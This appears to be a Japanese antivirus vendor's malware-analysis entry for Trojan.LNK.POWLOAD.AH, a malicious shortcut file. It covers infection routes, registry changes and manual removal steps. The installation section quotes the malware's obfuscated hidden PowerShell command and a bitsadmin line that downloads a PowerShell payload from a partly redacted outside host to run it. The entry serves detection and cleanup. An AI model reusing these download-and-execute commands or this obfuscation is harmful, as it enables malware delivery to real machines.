Trojan.LNK.POWLOAD.AH

2019年8月1日

解析者: Wilbert Luy

別名:

Trojan:PowerShell/BITSAbuse.H!lnk (Microsoft), Trojan.WinLNK.Powecod.gen (Kaspersky)

プラットフォーム:

Windows

危険度:

ダメージ度:

感染力:

感染確認数:

情報漏えい:

マルウェアタイプ: トロイの木馬型
破壊活動の有無: なし
暗号化: なし
感染報告の有無: はい

概要

感染経路インターネットからのダウンロード, 他のマルウェアからの作成

マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

ただし、情報公開日現在、このWebサイトにはアクセスできません。

詳細

ファイルサイズ 3,003 bytes

タイプ LNK

メモリ常駐はい

発見日 2018年10月8日

ペイロードファイルのダウンロード

侵入方法

マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

インストール

マルウェアは、以下のプロセスを追加します。

%System%\WindowsPowerShell\v1.0\powershell.exe" -noP -exec Bypass -nonI -c "&{$o4='fedgolsvfindstr'; $m2o='powershell -wi"N "hid"Den -c {'+$o4.SubString($o4.length - 7, 7)+' /s mrekikaso c:\users\*.lnk}'; $re=iex "$m2o"; "$re"|iex}
%System%\WindowsPowerShell\v1.0\powershell.exe" -wiN hidDen -encodedCommand {Base64 Encoded Strings} -inputFormat xml -outputFormat xml
%System%\findstr.exe" /s mrekikaso c:\users\*.lnk
%System%\cmd.exe" /C echo 1 > %Application Data%\1F944D56-602B-D0AB-CAF7-C2FBEEE740D2\d & bitsadmin /wrap /transfer mrekikaso /download /priority FOREGROUND "https://{BLOCKED}nglishcider.com/seng/ishci" %Application Data%\1F944D56-602B-D0AB-CAF7-C2FBEEE740D2\zZYfKHTEvupowt.ps1 & del %Application Data%\1F944D56-602B-D0AB-CAF7-C2FBEEE740D2\d & exit
bitsadmin /wrap /transfer mrekikaso /download /priority FOREGROUND "https://{BLOCKED}nglishcider.com/seng/ishci" %Application Data%\1F944D56-602B-D0AB-CAF7-C2FBEEE740D2\zZYfKHTEvupowt.ps1

他のシステム変更

マルウェアは、以下のレジストリ値を変更します。

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\
Control\BackupRestore\FilesNotToBackup
BITS_LOG = "%System%\Bits.log"

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\
Control\BackupRestore\FilesNotToBackup
BITS_BAK = "%System%\Bits.bak"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows\CurrentVersion\BITS
StateIndex = "{1 or 0}"

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\
services\BITS
Start = "2"

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\
services\BITS\Performance
PerfMMFileName = "Global\MMF_BITS_s"

ダウンロード活動

マルウェアは、以下のWebサイトにアクセスし、不正なファイルをダウンロードして実行します。

https://{BLOCKED}nglishcider.com/seng/ishci:443

その他

ただし、情報公開日現在、このWebサイトにはアクセスできません。

対応方法

対応検索エンジン: 9.850

初回 VSAPI パターンバージョン 14.552.09

初回 VSAPI パターンリリース日 2018年10月9日

VSAPI OPR パターンバージョン 14.553.00

VSAPI OPR パターンリリース日 2018年10月10日

手順 1

Windows XP、Windows Vista および Windows 7 のユーザは、コンピュータからマルウェアもしくはアドウェア等を完全に削除するために、ウイルス検索の実行前には必ず「システムの復元」を無効にしてください。

手順 2

このマルウェアもしくはアドウェア等の実行により、手順中に記載されたすべてのファイル、フォルダおよびレジストリキーや値がコンピュータにインストールされるとは限りません。インストールが不完全である場合の他、オペレーティングシステム（OS）の条件によりインストールがされない場合が考えられます。手順中に記載されたファイル／フォルダ／レジストリ情報が確認されない場合、該当の手順の操作は不要ですので、次の手順に進んでください。

手順 3

変更されたレジストリ値を修正します。

[ 詳細 ]

警告：レジストリはWindowsの構成情報が格納されているデータベースであり、レジストリの編集内容に問題があると、システムが正常に動作しなくなる場合があります。
事前に意図的に対象の設定を変更していた場合は、意図するオリジナルの設定に戻してください。変更する値が分からない場合は、システム管理者にお尋ねいただき、レジストリの編集はお客様の責任として行なって頂くようお願いいたします。弊社ではレジストリの編集による如何なる問題に対しても補償いたしかねます。
レジストリの編集前にこちらをご参照ください。

In HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\Performance
- PerfMMFileName = "Global\MMF_BITS_s"
In HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\Performance
- PerfMMFileName = "{Default Value}"
In HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\BackupRestore\FilesNotToBackup
- BITS_LOG = "%System%\Bits.log"
In HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\BackupRestore\FilesNotToBackup
- BITS_LOG = "{Default Value}"
In HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\BackupRestore\FilesNotToBackup
- BITS_BAK = "%System%\Bits.bak"
In HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\BackupRestore\FilesNotToBackup
- BITS_BAK = "{Default Value}"
In HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
- StateIndex = "{1 or 0}"
In HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
- StateIndex = "{Default Value}"
In HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS
- Start = "2"
In HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS
- Start = "{Default Value}"

このマルウェアが変更したレジストリ値の修正：

「レジストリエディタ」を起動します。
- Windows 2000、XP および Server 2003 の場合：
  [スタート]-[ファイル名を指定して実行]を選択し、regedit と入力し、Enter を押します。
- Windows Vista、7、Server 2008 の場合：
  [スタート]をクリックし、検索入力欄に regedit と入力し、Enter を押します。
- Windows 8、8.1 および Server 2012 の場合：
  画面の左下隅を右クリックし、[ファイル名を指定して実行]を選択します。入力ボックスに regedit と入力し、Enter を押します。
  ※regedit は半角英数字で入力する必要があります（大文字／小文字は区別されません）。
レジストリエディタの左側のパネルにある以下のフォルダをダブルクリックします。
HKEY_LOCAL_MACHINE>SYSTEM>ControlSet001>services>BITS>Performance
右側のパネルで以下のレジストリ値を検索します。
PerfMMFileName = "Global\MMF_BITS_s"
再び、右側のパネルで以下のレジストリ値を検索します。
PerfMMFileName = "{Default Value}"
レジストリエディタの左側のパネルにある以下のフォルダをダブルクリックします。
HKEY_LOCAL_MACHINE>SYSTEM>ControlSet001>Control>BackupRestore>FilesNotToBackup
右側のパネルで以下のレジストリ値を検索します。
BITS_LOG = "%System%\Bits.log"
再び、右側のパネルで以下のレジストリ値を検索します。
BITS_LOG = "{Default Value}"
再び、右側のパネルで以下のレジストリ値を検索します。
BITS_BAK = "%System%\Bits.bak"
再び、右側のパネルで以下のレジストリ値を検索します。
BITS_BAK = "{Default Value}"
レジストリエディタの左側のパネルにある以下のフォルダをダブルクリックします。
HKEY_LOCAL_MACHINE>SOFTWARE>Microsoft>Windows>CurrentVersion>BITS
右側のパネルで以下のレジストリ値を検索します。
StateIndex = "{1 or 0}"
再び、右側のパネルで以下のレジストリ値を検索します。
StateIndex = "{Default Value}"
レジストリエディタの左側のパネルにある以下のフォルダをダブルクリックします。
HKEY_LOCAL_MACHINE>SYSTEM>ControlSet001>services>BITS
右側のパネルで以下のレジストリ値を検索します。
Start = "2"
再び、右側のパネルで以下のレジストリ値を検索します。
Start = "{Default Value}"
レジストリエディタを閉じます。

手順 4

最新のバージョン（エンジン、パターンファイル）を導入したウイルス対策製品を用い、ウイルス検索を実行してください。「Trojan.LNK.POWLOAD.AH」と検出したファイルはすべて削除してください。検出されたファイルが、弊社ウイルス対策製品により既に駆除、隔離またはファイル削除の処理が実行された場合、ウイルスの処理は完了しており、他の削除手順は特にありません。

ご利用はいかがでしたか？　アンケートにご協力ください